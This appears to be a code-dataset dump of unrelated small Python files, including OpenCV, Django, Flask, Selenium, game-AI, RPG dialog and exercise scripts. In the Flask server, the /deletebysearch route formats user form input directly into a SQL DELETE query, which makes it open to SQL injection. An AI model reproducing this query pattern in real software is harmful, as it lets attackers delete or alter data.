\n\n","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"466821753","text":"import cv2\nimport cv2.cv as cv\nimport numpy as np\nimport imutils\n\n\nmask = cv2.imread('threshed.jpg')\nimg = cv2.imread('owlFiltered.jpg')\n#img2=imutils.resize(img,width=432,height=324)\n#img = cv2.medianBlur(img,5)\nmask=cv2.cvtColor(mask,cv2.COLOR_BGR2GRAY)\n\nret,mask=cv2.threshold(mask,10,1,cv2.THRESH_BINARY)\n\nb=np.multiply(img[:,:,0],mask)\ng=np.multiply(img[:,:,1],mask)\nr=np.multiply(img[:,:,2],mask)\n\nimg_final=np.zeros(img.shape[:])\nimg_final=np.uint8(img_final)\nimg_final[:,:,0]=b\nimg_final[:,:,1]=g\nimg_final[:,:,2]=r\n\n\nfiltered=imutils.resize(img_final,width=432,height=324)\n\n#cv2.imshow('detected circles',img2)\n#cv2.imshow('mask',mask)\ncv2.imshow('filtered',filtered)\ncv2.imwrite('FinalFiltered.jpg',img_final)\n\n\n\n#cv2.imshow('detected circles',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows() ","sub_path":"cvFinalMask.py","file_name":"cvFinalMask.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"261745993","text":"from django.shortcuts import render\nfrom . import forms\n# Create your views here.\n\ndef index(request):\n return render(request,'firstapp/index.html')\n\ndef form_name_view(request):\n #here form is used to pass the data to html page\n form = forms.FormName()\n if request.method=='POST':\n #here down form is used to check valid and this bring data \n form = forms.FormName(request.POST)\n if form.is_valid():\n #Do somethings codeing\n print(\"Validation successful\")\n print(\"Name :\",form.cleaned_data['name'])\n print(\"Name :\",form.cleaned_data['email'])\n print(\"Name :\",form.cleaned_data['text'])\n\n return render(request,'firstapp/basic_form.html',{'form':form})\n","sub_path":"levelthree/firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"116339643","text":"import subprocess\nimport sqlite3\nimport pandas as pd\nfrom flask import Flask,request,render_template,redirect,send_file,send_from_directory\nimport os\nimport time\n# import requests\napp = Flask(__name__)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return redirect('http://127.0.0.1:5000/home')\n\n@app.route('/')\ndef home():\n return redirect('http://127.0.0.1:5000/home')\n\n@app.route('/home')\ndef my_form():\n return render_template('home.html')\n\n@app.route('/home', methods=['POST'])\ndef my_form_post():\n country_striped = request.form['input1']\n city_striped = request.form['input2']\n keyword_striped = request.form['input3']\n\n country = country_striped.strip()\n city = city_striped.strip()\n keyword = keyword_striped.strip()\n\n if country != '' and city != '' and keyword != '':\n if (os.stat(os.path.abspath(os.curdir)+'\\country.txt').st_size != 0):\n with open(os.path.abspath(os.curdir)+'\\country.txt', 'a') as f:\n f.write('\\n')\n if(os.stat(os.path.abspath(os.curdir)+'\\city.txt').st_size != 0):\n with open(os.path.abspath(os.curdir)+'\\city.txt', 'a') as f:\n f.write('\\n')\n if (os.stat(os.path.abspath(os.curdir)+'\\keyword.txt').st_size != 0):\n with open(os.path.abspath(os.curdir)+'\\keyword.txt', 'a') as f:\n f.write('\\n')\n new_country=''\n new_city=''\n new_keyword=''\n\n for b in country:\n if(b=='\\n'):\n new_country+=''\n else:\n new_country+=b\n\n for b in city:\n if(b=='\\n'):\n new_city+=''\n else:\n new_city+=b\n\n for b in keyword:\n if(b=='\\n'):\n new_keyword += ''\n else:\n new_keyword += b\n\n if request.method == 'POST':\n if country!='' and city!='' and keyword!='':\n with open(os.path.abspath(os.curdir)+'\\country.txt', 'a') as f:\n f.write(str(new_country))\n with open(os.path.abspath(os.curdir)+'\\city.txt', 'a') as f:\n f.write(str(new_city))\n with open(os.path.abspath(os.curdir)+'\\keyword.txt', 'a') as f:\n f.write(str(new_keyword))\n # return render_template('home.html', find=find,near=near)\n return redirect('http://127.0.0.1:5000/home')\n\n@app.route(\"/view\")\ndef view_get():\n con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n con.row_factory = sqlite3.Row\n cur = con.cursor()\n cur.execute(\"select * from detail\")\n rows = cur.fetchall()\n\n return render_template(\"index.html\", rows=rows)\n\n@app.route(\"/delete\")\ndef delete_all():\n con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n con.row_factory = sqlite3.Row\n cur = con.cursor()\n cur.execute(\"select * from detail\")\n\n cur.execute('DELETE FROM detail;', )\n # rows = cur.fetchall()\n con.commit()\n\n return redirect('http://127.0.0.1:5000/view')\n\n\n@app.route(\"/convertcsv\")\ndef csv():\n con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n con.row_factory = sqlite3.Row\n\n df = pd.read_sql_query(\"SELECT * FROM detail\", con)\n print(df)\n print(type(df))\n\n with open(os.path.abspath(os.curdir)+'\\static\\details.csv', \"w\") as my_empty_csv:\n # now you have an empty file already\n pass\n\n df.to_csv(os.path.abspath(os.curdir)+'\\static\\details.csv', index=False)\n\n return redirect('http://127.0.0.1:5000/view')\n\n# @app.route(\"/down\")\n# def downloadcsv():\n# con = sqlite3.connect(os.path.abspath(os.curdir) + \"\\searchdetail.db\")\n# con.row_factory = sqlite3.Row\n#\n# df = pd.read_sql_query(\"SELECT * FROM detail\", con)\n# print(df)\n# print(type(df))\n# df.to_csv(os.path.abspath(os.curdir) + '\\details.csv', index=False)\n# time.sleep(20)\n# print(\"for downloading csv\")\n# #\n# return send_file(os.path.abspath(os.curdir)+'\\static\\details.csv',\n# mimetype='text/csv',\n# attachment_filename='details',\n# as_attachment=True)\n # print('hi')\n # return send_file(os.path.abspath(os.curdir)+'\\static\\details.csv',mimetype='text/csv',\n # attachment_filename='details.csv',as_attachment=True)\n # filename = 'details.csv'\n # uploads = os.path.abspath(os.curdir)+'\\static'\n # return send_from_directory(directory=uploads, filename=filename)\n\n\n@app.route(\"/deletebysearch\", methods=['POST'])\ndef deletebysearch():\n key_striped = request.form['del']\n\n key = key_striped.strip()\n print(key)\n print(type(key))\n if(key!=''):\n sqliteConnection = sqlite3.connect(os.path.abspath(os.curdir)+'\\searchdetail.db')\n cursor = sqliteConnection.cursor()\n\n # sql_delete_query = \"SELECT * FROM detail WHERE keyword LIKE '%Dentist%'\"\n # query = str(\"DELETE FROM detail WHERE keyword LIKE\"+ \" %{\".format(key))\n query = \"DELETE FROM detail WHERE keyword LIKE '%{}%'\".format(key)\n sql_delete_query = query\n cursor.execute(sql_delete_query)\n sqliteConnection.commit()\n\n return redirect('http://127.0.0.1:5000/view')\n\n\n@app.route(\"/view\", methods=['POST'])\ndef view():\n con = sqlite3.connect(os.path.abspath(os.curdir)+\"\\searchdetail.db\")\n con.row_factory = sqlite3.Row\n cur = con.cursor()\n\n\n\n # if request.method == 'POST':\n country_striped = request.form['input1']\n city_striped = request.form['input2']\n keyword_striped = request.form['input3']\n\n country = country_striped.strip()\n city = city_striped.strip()\n keyword = keyword_striped.strip()\n\n if(country!='' and city!='' and keyword!=''):\n # cur.execute(\"select * from detail where country\")\n cur.execute(\"SELECT * FROM detail WHERE country=? and city=? and keyword=?\", (country,city,keyword,))\n rows = cur.fetchall()\n if(len(rows)==0):\n cur.execute(\"select * from detail\")\n rows = cur.fetchall()\n else:\n cur.execute(\"select * from detail\")\n rows = cur.fetchall()\n return render_template(\"index.html\",rows = rows)\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"searchdetail/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"388531442","text":"#!/usr/bin/env python\n# vim:set fileencoding=utf-8:\n\nimport functools\n\n__all__ = ['memoized']\n\nclass memoized(object):\n \"\"\"Decorator that caches a function's return value each time it is called.\n If called later with the same arguments, the cached value is returned, and\n not reevaluated.\n \"\"\"\n\n def __init__(self, func):\n self.__func = func\n self.cache = {}\n\n self.__name__ = self.__func.__name__\n self.__doc__ = self.__func.__doc__\n\n def __call__(self, *args):\n try:\n return self.cache[args]\n except KeyError:\n value = self.__func(*args)\n self.cache[args] = value\n return value\n except TypeError:\n # Uncachable -- for instance, passing a list as an argument. Better\n # to not cache than to blow up entirely.\n return self.__func(*args)\n\n def __repr__(self):\n return '<{0}.memoized({1})>'.format(self.__module__,\n self.__func.__name__)\n\n def __get__(self, obj, objtype):\n # Support instance methods.\n return functools.partial(self.__call__, obj)\n\n\n# vim:set si tw=80 ts=4 sw=4 et nowrap:\n","sub_path":"pyfea/util/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"460117611","text":"from dataclasses import field\nimport random\n\nfrom panda3d.core import Vec3\n\nimport wecs\n\nfrom wecs.core import Component\nfrom wecs.core import System\nfrom wecs.core import and_filter\n\nfrom wecs.panda3d.character import CharacterController\nfrom wecs.panda3d.input import Input\n\n\ndef idle(entity):\n character = entity[CharacterController]\n character.move = Vec3(0, 0, 0)\n character.heading = 0.0\n character.pitch = 0.0\n character.sprints = False\n character.crouches = False\n character.jumps = False\n\n\ndef turn_left(entity, speed=1.0):\n character = entity[CharacterController]\n character.move = Vec3(0, 0, 0)\n character.heading = speed\n character.pitch = 0.0\n character.sprints = False\n character.crouches = False\n character.jumps = False\n\n\ndef turn_right(entity, speed=1.0):\n character = entity[CharacterController]\n character.move = Vec3(0, 0, 0)\n character.heading = -speed\n character.pitch = 0.0\n character.sprints = False\n character.crouches = False\n character.jumps = False\n\n\nclass BehaviorTree:\n def __init__(self, root):\n self.root = root\n\n def __call__(self, entity, *args):\n \"\"\"Returns True if node has run, False if it can't be run, and\n raises an exception for special cases, e.g. being done with a\n task.\"\"\"\n self.root(entity, *args)\n\n\nclass Priority:\n def __init__(self, *nodes):\n self.nodes = nodes\n \n def __call__(self, entity, *args):\n for node in self.nodes:\n if node(entity, *args):\n return True\n return False\n\n\n# Selector: Prioritized list of options.\n# Sequence: One child after the other\n# Parallel: Executes all children\n# FSM\n# Attached at runtime: Node behavior is specified re-/set runtime, if no\n# behavior is attached, node fails\n# Decorators: Modify node behavior\n# * Return\n# * Always succeed\n# * Always fail\n# * Always raise exception\n# * Interruptions\n# * Minimum / maximum distance to entity reached\n# * Sensor detects object\n# * Timeout\n# * Uninterruptable: Node will continue to be used until finished,\n# even if higher-priority options become activate in the meantime.\n# * Repetition\n# * Loop n times / infinitely\n# * Debugging\n# * Tag: Present active tags to user\n# * Message: Log message on activation / deactivation / per frame\n# * Breakpoint: Pause game and inspect behavior\n\n\n@Component()\nclass ConstantCharacterAI:\n \"\"\"\n Parameters for the 'constant' behavior.\n Keeps moving in the same direction.\n\n :param Vec3 move: (0, 0, 0) - relative directional movement speed\n :param float heading: 0.0 - heading\n :param float pitch: 0.0 - pitch\n :param bool sprints: False - is sprinting\n :param bool crouches: False - is crouching\n :param bool jumps: False - starts jumping\n \"\"\"\n\n move: Vec3 = field(default_factory=lambda:Vec3(0, 0, 0))\n heading: float = 0.0\n pitch: float = 0.0\n sprints: bool = False\n crouches: bool = False\n jumps: bool = False\n\n\ndef constant(entity):\n ai = entity[ConstantCharacterAI]\n character = entity[CharacterController]\n\n character.move = ai.move\n character.heading = ai.heading\n character.pitch = ai.pitch\n character.sprints = ai.sprints\n character.crouches = ai.crouches\n character.jumps = ai.jumps\n\n\n@Component()\nclass BrownianWalkerAI:\n '''\n Parameters for the 'brownian_walker' behavior.\n Moves randomly.\n\n :param Vec3 move: (0, 0, 0) - relative directional movement speed\n :param float heading: 0.0 - heading\n :param float heading_jitter: 0.0 - amount heading is randomized each update\n '''\n move: Vec3 = field(default_factory=lambda:Vec3(0, 1, 0))\n heading: float = 1.0\n heading_jitter = 0.1\n\n\ndef brownian_walker(entity):\n ai = entity[BrownianWalkerAI]\n character = entity[CharacterController]\n\n character.move = Vec3(\n ai.move.x * random.random(),\n ai.move.y * random.random(),\n ai.move.z * random.random(),\n )\n ai.heading += ai.heading_jitter * (random.random() - 0.5) * 2\n if ai.heading > 1:\n ai.heading -= 2\n elif ai.heading < -1:\n ai.heading += 2\n character.heading = ai.heading\n character.pitch = 0\n character.sprints = 0\n character.crouches = 0\n character.jumps = 0\n\n\ndef walk_to_entity(entity, target_entity_uid, coordinates=None):\n if coordinates is None:\n coordinates = Vec3(0, 0, 0)\n\n character = entity[CharacterController]\n target_entity = base.ecs_world.get_entity(target_entity_uid)\n\n character_node = entity[wecs.panda3d.prototype.Model].node\n target_node = target_entity[wecs.panda3d.prototype.Model].node\n rel_pos = character_node.get_relative_point(target_node, coordinates)\n xy_dist = Vec3(rel_pos.x, rel_pos.y, 0)\n\n character.heading = 0\n character.move = Vec3(0, 0, 0)\n character.pitch = 0\n character.sprints = 0\n character.crouches = 0\n character.jumps = 0\n\n # If the target is behind you, turn towards it.\n if rel_pos.y < 0:\n if rel_pos.x < 0:\n character.heading = 1\n else:\n character.heading = -1\n else:\n # If the target is outside a tight frontal cone, continue turning.\n if abs(rel_pos.x) * 5 > rel_pos.y:\n if rel_pos.x < 0:\n character.heading = 1\n else:\n character.heading = -1\n # If it is within a somewhat wider cone, move forward.\n if abs(rel_pos.x) * 2 < rel_pos.y:\n character.move = Vec3(0, 0.2, 0)\n\n\ndef behaviors():\n return dict(\n idle=idle,\n turn_left=turn_left,\n turn_right=turn_right,\n constant=constant,\n brownian_walker=brownian_walker,\n walk_to_entity=walk_to_entity,\n )\n\n\n@Component()\nclass BehaviorAI:\n '''\n Preprogrammed behaviors.\n '''\n behavior: str = field(default_factory=lambda: list(['idle']))\n behaviors: dict = field(default_factory=behaviors)\n\n\nclass Think(System):\n '''\n A System updating AI components.\n '''\n entity_filters = {\n 'behavior': [\n CharacterController,\n BehaviorAI,\n ],\n }\n\n def update(self, entities_by_filter):\n for entity in entities_by_filter['behavior']:\n ai = entity[BehaviorAI]\n behavior = ai.behavior[0]\n args = ai.behavior[1:]\n\n ai.behaviors[behavior](entity, *args)\n\n\nclass PrintBehaviorOnPlayerCharacters(System):\n entity_filters = {\n 'character': [Input, BehaviorAI, CharacterController],\n }\n\n def update(self, entities_by_filter):\n for entity in entities_by_filter['character']:\n behavior = entity[BehaviorAI]\n\n print(behavior.behavior)\n\n\nclass BehaviorInhibitsDirectCharacterControl(System):\n entity_filters = {\n 'character': [Input, BehaviorAI, CharacterController],\n }\n\n def update(self, entities_by_filter):\n for entity in entities_by_filter['character']:\n behavior = entity[BehaviorAI]\n input = entity[Input]\n\n if len(behavior.behavior) == 1 and behavior.behavior[0] == 'idle':\n input.contexts.add('character_movement')\n elif 'character_movement' in input.contexts:\n input.contexts.remove('character_movement')\n","sub_path":"wecs/panda3d/ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"371505248","text":"#Alexander_Máni_Einarsson\r\n#12/11/19\r\n#Skilaverkefni 6\r\n\r\nimport random\r\n\r\non = True\r\nwhile on:\r\n print()\r\n print(\"=-=-=-> Skilaverkefni 6<-=-=-=\")\r\n print()\r\n print(\"1. Random tölur\")\r\n print(\"2. Talnabil\")\r\n print(\"3. Strengjalisti\")\r\n print(\"4. Samanburður\")\r\n print(\"5. Hætta\")\r\n val = int(input(\"Veldu: \"))\r\n if val == 1:\r\n print()\r\n print(\"Hér tekur foritið inn 50 tölur á bilini 5-70 að handahófi\")\r\n print(\"og prentar síðan út ýmsar staðreyndir\")\r\n talnalisti = []\r\n #50 random tölur á milli 5 og 70 fengnar\r\n for x in range(50):\r\n tala = random.randint(5,70)\r\n talnalisti.append(tala)\r\n teljari = 0\r\n margfeldi = 1\r\n #Allar tölur margfaldaðar\r\n for x in range(len(talnalisti)):\r\n margfeldi = margfeldi * talnalisti[teljari]\r\n teljari = teljari + 1\r\n #Ýmsar upplýsingar um listann, talnsalisti fenginn, útskýringar í græna letrinu\r\n print(\"Hér er margfeldi allra staka listans\", margfeldi)\r\n print(\"Hæsta stak listans er : \", max(talnalisti))\r\n print(\"Minnsta stak listans er: \", min(talnalisti))\r\n print(\"Hér er talnalistinn útprentaður: \",talnalisti)\r\n talnalisti.sort()\r\n print(\"Hér er talnalistinn raðaður og útprentaður: \",talnalisti)\r\n\r\n elif val == 2:\r\n print()\r\n tala = 2000\r\n talnalisti = []\r\n #Tölunar eiga að ver frá 2000-32000. það eru 1200 þar á milli svo það er range-ið svo fer það í if klausu sem finnur út hvort það gengur upp í 7 en ekki 5\r\n for x in range(1200):\r\n tala = tala + 1\r\n if tala % 7 == 0 and tala % 5 != 0:\r\n talnalisti.append(tala)\r\n teljari = 0\r\n #Foritið leggur saman allar tölunar í listanum í þessari slaufu\r\n for x in range(len(talnalisti)):\r\n print(\" Allar tölur listans í beinni línu með kommur á milli: \",talnalisti[teljari],\",\", end=\" \")\r\n teljari = teljari + 1\r\n print(\"\\n\",\"Summa allra a talna listans: \",sum(talnalisti))\r\n\r\n elif val == 3:\r\n print()\r\n teljari = 0\r\n ordalisti = []\r\n #Whie lykkja sem keyrir 10 sinnum\r\n while teljari < 10:\r\n ordin = input(\"Sláðu inn orð til að bæta í lista: \")\r\n ordalisti.append(ordin)\r\n teljari = teljari + 1\r\n teljari = 0\r\n print()\r\n print(\"Hér er annaðhvert orð í listanum skrifað út öfugt\")\r\n for x in range(len(ordalisti)):\r\n stak = ordalisti[teljari]\r\n if teljari % 2 == 0:\r\n print(stak[::-1])\r\n teljari = teljari + 1\r\n print()\r\n #Listinn aðeins raðaur í prentun svo hann helst óbreyttur í raun\r\n print(\"Hér er listinn raðaður: \", sorted(ordalisti))\r\n print()\r\n stafur = input(\"Sláðu inn þann staf sem á að eyða orðum með sama upphafsstaf: \")\r\n teljari = 0\r\n staf_teljari = 0\r\n nyr_listi = []\r\n print()\r\n #Nýr listi búinn með þeim orðum sem haf ekki sama upphafstaf og notandi gefur sem lætur það lýta út eins og eytt hefur verið þeim orðum sem byrja á þeim staf.\r\n for x in range(len(ordalisti)):\r\n stak = ordalisti[teljari]\r\n if stafur != stak[0]:\r\n nyr_listi.append(stak)\r\n else:\r\n staf_teljari = staf_teljari +1\r\n teljari = teljari + 1\r\n print()\r\n print(staf_teljari, \"Staf/Stöfum var eytt\")\r\n print()\r\n print(\"Hér er listinn út prentaður með eyddu orðunum: \",nyr_listi)\r\n\r\n elif val == 4:\r\n print()\r\n ordalisti = []\r\n teljari = 0\r\n #While lykkja sem keyrir 7 sinnum\r\n while teljari < 7:\r\n ordin = input(\"Sláðu inn orð til að bæta í lista: \")\r\n ordalisti.append(ordin)\r\n teljari = teljari + 1\r\n teljari = 0\r\n ordalisti_2 = []\r\n # While lykkja sem keyrir 6 sinnum\r\n while teljari < 6:\r\n ordin = input(\"Sláðu inn orð til að bæta í lista 2: \")\r\n ordalisti_2.append(ordin)\r\n teljari = teljari + 1\r\n nyr_listi = []\r\n teljari_1 = 0\r\n # While lykkja sem keyrir 7 sinnum\r\n #Með for lykkjunni fyrir neðan lætur þetta hvert einasta orð í báðum listum bers gi saman við hvort annað.\r\n while teljari_1 < 7:\r\n teljari = 0\r\n #Þetta keyrir sex sinnum\r\n for x in range(len(ordalisti_2)):\r\n stak = ordalisti[teljari_1]\r\n stafur = ordalisti_2[teljari]\r\n #Þau orð sem eru eins í báðum listum eru færð yfir í nýjan lista til að safna þeim sem eru eins\r\n if stafur == stak:\r\n nyr_listi.append(stak)\r\n teljari = teljari + 1\r\n teljari_1 = teljari_1 + 1\r\n print(\"Eftirfarandi orð eru eins í báðum listum\", nyr_listi)\r\n\r\n elif val == 5:\r\n print(\"Nú verður foritinu hætt\")\r\n quit()\r\n\r\n else:\r\n print(\"Villa hefur komið upp\")\r\n","sub_path":"py_projects/forritun/skilaverkefni/skilaverkefni_6.py","file_name":"skilaverkefni_6.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355555125","text":"from selenium import webdriver\n\n# In This example In this case we capture the element, that we want to work with,\n# using javascript provided methods, then declare some actions on it and execute\n# this javascript using WebDriver.\n\n# Step 1) Open Firefox\ndriver = webdriver.Firefox()\n# Step 2) Navigate to OrangeHRM\ndriver.get(\"https://opensource-demo.orangehrmlive.com/\")\n\nsubmit = \"document.getElementsByName('Submit')[0].click();\"\ndriver.execute_script(submit)","sub_path":"TestScripts/JavaScript_Example/Execute_JavaScript_Exp1.py","file_name":"Execute_JavaScript_Exp1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"499370282","text":"from RPG.consts.game_states import ESTRAD_TRADER, ESTRAD_TRADER_TRADE_MENU, ESTRAD_TRADER_BUY, ESTRAD_TRADER_SELL\nfrom RPG.bot_classes.base_dialog import BaseDialog\nfrom RPG.consts.quest_items import FEDERATION_PASS\nfrom RPG.consts.items import LITTLE_MED_PACK, LIGHT_SOLDIER_ARMOR_SET, LIGHT_LASER_RIFFLE, OLD_LASER_PISTOL\nfrom RPG.bot_classes.trader import TradeMenu\n\n\nclass EstradTrader(BaseDialog):\n def __init__(self, game):\n super().__init__(game, ESTRAD_TRADER, 'Soldado De La República Intergaláctica', '¡Salud! Aquí '\n 'puedes obtener una base '\n 'kit de soldado de la Federación si u'\n ' tienes una identificación, o '\n 'comprar equipo adicional,'\n ' si lo básico no es suficiente para TI.',\n '👨🏼')\n self.reply_keyboard.row('Muéstrame tus productos')\n self.reply_keyboard.row('Quiero conseguir un kit')\n self.reply_keyboard.row('Tengo que irme.')\n self.kit_given = False\n self.trade_menu = TradeMenu(game, self, ESTRAD_TRADER_TRADE_MENU, ESTRAD_TRADER_BUY, ESTRAD_TRADER_SELL,\n 'Mira esto., '\n 'lo que tengo.',\n [LITTLE_MED_PACK, OLD_LASER_PISTOL], 1.25)\n\n def handle(self, message):\n if message.text == 'Muéstrame tus productos':\n self.trade_menu.start(message)\n elif message.text == 'Quiero conseguir un kit':\n if FEDERATION_PASS in self.game.player.quest_items:\n if not self.kit_given:\n self.game.player.add_item(LIGHT_LASER_RIFFLE)\n self.game.player.add_item(LITTLE_MED_PACK)\n self.game.player.add_item(LIGHT_SOLDIER_ARMOR_SET)\n self.game.player.laser_ammo += 20\n self.kit_given = True\n self.say(message, 'Aquí tienes. Bienvenido a las filas de los colonizadores del planeta Estrada!')\n else:\n self.say(message, \"Un juego por mano, ya tienes el tuyo.\")\n else:\n self.say(message, 'Lo siento, sin un soldado de la Federación, no puedo darte un kit de combate.')\n elif message.text == 'Tengo que irme.':\n self.say(message, 'Pasa otra vez.')\n self.game.estrad.colony.start(message)\n else:\n self.show_input_error(message)\n","sub_path":"RPG/bot_classes/locations/planets/estrad/colony/estrad_trader.py","file_name":"estrad_trader.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"68692064","text":"#!/usr/bin/python3.7\n# -*- coding: utf-8 -*-\n# @Time : 2020/11/15 14:41\n# @Author : dly\n# @File : 142.py\n# @Desc :\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head or not head.next:\n return None\n\n slow = head\n fast = head\n while True:\n if not fast or not fast.next:\n return None\n slow = slow.next\n fast = fast.next.next\n if fast == slow:\n break\n\n fast = head\n while slow != fast:\n fast = fast.next\n slow = slow.next\n\n return fast\n","sub_path":"hot/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"143374985","text":"import cocotb\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import Timer\nfrom cocotb.triggers import FallingEdge\nfrom cocotb.triggers import RisingEdge\nfrom cocotb.triggers import ClockCycles\nfrom cocotb.result import TestFailure\nfrom threading import Thread\nfrom functools import partial\n\n\np = []\n\nasync def run_task(t):\n t = Thread(target = t)\n t.start()\n\n i = 0\n print(\"looping sim to allow the test run\")\n while t.is_alive():\n i += 1\n await Timer(10000000, 'step')\n\n print(\"waiting for test thread\")\n t.join()\n\ndef start(l):\n if isinstance(l, list):\n for i in l:\n start(i)\n else:\n for j in l.get_test_processes():\n p.append(cocotb.fork(j()))\n\ndef stop():\n print(\"waiting for uart processes\")\n for i in p:\n i.join()\n\nasync def run(pr, *args, **kwargs):\n for i in args:\n start(i)\n for i in kwargs:\n start(kwargs[i])\n await run_task(partial(pr, *args, **kwargs))\n stop()\n\n","sub_path":"cocotb_test.py","file_name":"cocotb_test.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588742835","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# if语句\n# 根据Python的缩进规则,如果if语句判断是True,就执行缩进的两行print语句\nage = 20\nif age >= 18:\n print('your age is', age)\n print('adult')\n# if-else语句(注意不要少写:)\nage = 3\nif age >= 18:\n print('your age is', age)\n print('adult')\nelse:\n print('your age is', age)\n print('teenager')\n# if-elif-else语句\nage = 3\nif age >= 18:\n print('adult')\nelif age >= 6:\n print('teenager')\nelse:\n print('kid')\n# if判断条件可以简写,只要表达式是非零数值、非空字符串、非空list等就判断为True,否则为False\nif 1:\n print('True')\n\n# for...in循环,依赖把list或tuple中的每个元素迭代出来\nnames = ['Michael', 'Bob', 'Tracy']\nfor name in names:\n print(name)\nsum = 0\n# 计算1-10的整数之和\nfor x in [1,2,3,4,5,6,7,8,9,10]:\n sum = sum + x\nprint(sum)\n# 计算1-100的整数之和,可使用range(x)函数生成一个从0开始小于x的整数序列\nsum = 0\nfor x in range(101):\n sum = sum + x\nprint(sum)\n\n# while循环\nsum = 0\nn = 99\nwhile n > 0:\n sum = sum + n\n n = n - 2\nprint(sum)\n\n# 根据输入的年份进行判断\nbirth = input('birth: ')\n\n# TypeError: '<' not supported between instances of 'str' and 'int'\ntry:\n if(birth < 2000):\n print(u'00前')\n else:\n print(u'00后')\nexcept TypeError as e:\n print(e)\n# 以上代码输入1989却输出:00后,这显然是不对的\n# input读取的内容永远以字符串形式返回,必须先用int()把字符串转换为整型\nbirth = int(input('birth: '))\nprint('birth < 2000:', birth < 2000)\n\n","sub_path":"ifforwhile.py","file_name":"ifforwhile.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"244374975","text":"\"\"\"\r\nWrite a program that computes the value of a+aa+aaa+aaaa with a given digit as the value of a.\r\nSuppose the following input is supplied to the program:\r\n9\r\nThen, the output should be:\r\n11106\r\n\r\nHints:\r\nIn case of input data being supplied to the question, it should be assumed to be a console input.\r\n\"\"\"\r\n\r\nx = int(input(\"Enter a number: \"))\r\na = int(\"%s\" % x)\r\nb = int(\"%s%s\" % (x, x))\r\nc = int(\"%s%s%s\" % (x, x, x))\r\nd = int(\"%s%s%s%s\" % (x, x, x, x))\r\nprint(a + b + c + d)\r\n","sub_path":"AddingADigit.py","file_name":"AddingADigit.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"560875808","text":"\"\"\"DOCSTRING\"\"\"\nfrom flask import Flask, render_template, request\nfrom tscores import Scores\n\nAPP = Flask(__name__)\nSCORE = Scores()\n\n@APP.route('/')\ndef hello_world():\n \"\"\"Takes the information from the score form in index.html\"\"\"\n team = request.args.get('team')\n dscore = request.args.get('dscore')\n score1 = SCORE.get_score('team1')\n score2 = SCORE.get_score('team2')\n return render_template('index.html', score1=score1)\n return render_template('index.html', score2=score2)\n \nif __name__ == '__main__':\n APP.run(debug=True)\n","sub_path":"score_app/score_app.py","file_name":"score_app.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"250104835","text":"from django.http import HttpResponse\nimport json\nfrom ..models import Task, Task_detail\n\n\ndef task_detail(request, id):\n ret_dict = []\n\n if id == 'all':\n tasks = Task_detail.objects.all().values()\n elif id.isdigit():\n tasks = Task_detail.objects.filter(pk=int(id)).values()\n\n if not tasks:\n ret_dict.append(\"Error: There are no records for id {}\".format(id))\n\n for task in tasks:\n ret_dict.append({\n 'id': task['id'],\n 'name': task['name'],\n 'status': task['status'],\n 'start_date': str(task['start_date']),\n 'end_date': str(task['end_date']),\n 'duration': task['duration'],\n 'net_duration': task['net_duration'],\n 'owner': [child_task['owner'] for child_task in Task.objects.filter(name=task['name']).values('owner')],\n\n })\n\n return HttpResponse(json.dumps(ret_dict))\n","sub_path":"task_list/webapi/task_listjson.py","file_name":"task_listjson.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"578297689","text":"# _*_ coding: utf-8 _*_\r\n\"\"\"\r\nauthor: tongxiao\r\ndate: 2016-11-01\r\ndescription: 融资数据匹配eid\r\n\"\"\"\r\n\r\n\r\nfrom src.head import *\r\n\r\n\r\nclass FinancesPrePlugin01:\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def __call__(self):\r\n pass\r\n\r\n def __generate_hist_name_for_query(self, inname_text):\r\n \"\"\"\r\n 遍历历史名称查询\r\n :param inname_text:\r\n :return:\r\n 